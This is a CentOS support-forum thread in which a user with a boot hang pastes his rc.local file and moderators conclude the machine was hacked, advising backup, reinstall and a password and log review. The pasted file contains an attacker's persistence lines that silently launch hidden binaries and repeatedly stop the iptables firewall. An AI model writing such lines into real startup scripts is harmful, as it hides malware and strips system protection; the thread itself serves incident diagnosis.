Booting Issue: Start Service Local?

Support for the other architectures (X86_64, IA-64, and PowerPC)
zdn3023
Posts: 8
Joined: 2014/02/10 22:01:44

Booting Issue: Start Service Local?

Postby zdn3023 » 2014/05/27 22:18:36

Hello everyone,
I encountered a system halt problem during computer start-up. I could see the mouse cursor, but the screen was empty and had no log-in window. After I set the bootcode to "nomodeset", and then booted the system in "Interactive" mode, I found out that the system halted at "start service local". If I chose "No", the system then would display the log-in window and everything worked fine as usual. If I chose "yes", the system would hung as I described already.

I don't know what "service local" is, and could not find it from system menu: server setting/services. Therefore, I am unable to "remove" it from the booting procedure. Each time I reboot the computer, I have to go to the interactive mode and choose "No" at "Start service local". If you have any suggestions to solve this problem, please let me know.

The computer has CentOS 5.10, Linux 2.6.18-371.8.1.el5 #1 SMP Thu Apr 24 18:19:36 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux.

Thank you very much,

Simon

gerald_clark
Posts: 10642
Joined: 2005/08/05 15:19:54
Location: Northern Illinois, USA

Re: Booting Issue: Start Service Local?

Postby gerald_clark » 2014/05/27 22:33:13

Did you modify /etc/rc.d/rc.local ?

zdn3023
Posts: 8
Joined: 2014/02/10 22:01:44

Re: Booting Issue: Start Service Local?

Postby zdn3023 » 2014/05/28 02:10:08

I did not modify rc.local, but its modification date is 5/9/2014, so I wonder if the file could have been changed during a system update. The following content is in the file "rc.local":

#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.

touch /var/lock/subsys/local
nohup /usr/bin/.Syste > /dev/null 2>&1 &
/etc/init.d/iptables stop
nohup /usr/sbin/.Addre > /dev/null 2>&1 &
/etc/init.d/iptables stop
nohup /usr/bin/.Syste > /dev/null 2>&1 &
nohup /usr/sbin/.Addre > /dev/null 2>&1 &
/etc/init.d/iptables stop
nohup /usr/sbin/.Syste > /dev/null 2>&1 &
nohup /root/.Addre > /dev/null 2>&1 &
/etc/init.d/iptables stop
nohup /usr/sbin/.Syste > /dev/null 2>&1 &
nohup /root/.Addre > /dev/null 2>&1 &
/usr/sbin/mingetty
/root/System

gerald_clark
Posts: 10642
Joined: 2005/08/05 15:19:54
Location: Northern Illinois, USA

Re: Booting Issue: Start Service Local?

Postby gerald_clark » 2014/05/28 04:28:59

Very suspicious.
I'd reinstall.

User avatar
TrevorH
Forum Moderator
Posts: 21206
Joined: 2009/09/24 10:40:56
Location: Brighton, UK

Re: Booting Issue: Start Service Local?

Postby TrevorH » 2014/05/28 09:00:28

I agree, that looks like you've been hacked :-(
CentOS 5 died in March 2017 - migrate NOW!
Full time Geek, part time moderator. Use the FAQ Luke

zdn3023
Posts: 8
Joined: 2014/02/10 22:01:44

Re: Booting Issue: Start Service Local?

Postby zdn3023 » 2014/05/28 17:24:26

Hacked? ? ? Thanks for the troubleshooting. I have a few questions, and please help me out.
(1) I am not very familiar with CentOS. Could you tell me why I may need a re-installation? I performed a few system updates recently by following the update wizard in CentOS.
(2) This is a multiple user computer, and each user has his/her own log-in and password. Will the re-installation of CentOS remove all the existing accounts?
(3) Any specific security setting I should apply to avoid future hacker problem? The computer has been set to use plain FTP protocol for data transfer. Could this FTP protocol be a problem?


Thank you,
Simon

User avatar
TrevorH
Forum Moderator
Posts: 21206
Joined: 2009/09/24 10:40:56
Location: Brighton, UK

Re: Booting Issue: Start Service Local?

Postby TrevorH » 2014/05/28 20:12:33

Well if you haven't been hacked tehn something very odd is going on. Nothing in CentOS uses rc.local and certainly not to add lines that invoke hidden files in various different locations nor to stop the built-in firewall (several times, to be sure, to be sure).

Unfortunately we have no way of finding out how this happened. I guess nor have you. Once they were in, and it looks like they have root privileges since they were able to create files in /usr/bin and /usr/sbin which are root owned directories, they could have done anything. There could be backdoors installed in any number of normally innocuous utilities to give them access back in case you manage to close down the "easy" routes. Thus the only safe way to go is the backup-your-data-and-reinstall route to make sure that you are starting from a known good situation.

You could back up /etc/passwd and /etc/group and /etc/shadow but you should really reset all passwords and carefully examine what accounts are in passwd to make sure that they haven't added their own to that. You should go through your logs and see if you can work out how they got in. If you have ssh open to the internet and allow password authentication and have a relatively easy-to-guess root password then they could have brute forced their way in. If one of your users is set up similarly then they could have got in as a user and used an unfixed security vulnerability to escalate to root and go from there.
CentOS 5 died in March 2017 - migrate NOW!
Full time Geek, part time moderator. Use the FAQ Luke

zdn3023
Posts: 8
Joined: 2014/02/10 22:01:44

Re: Booting Issue: Start Service Local?

Postby zdn3023 » 2014/05/29 16:00:27

Thank you very much, Trevor! I guess I will have to reinstall the system.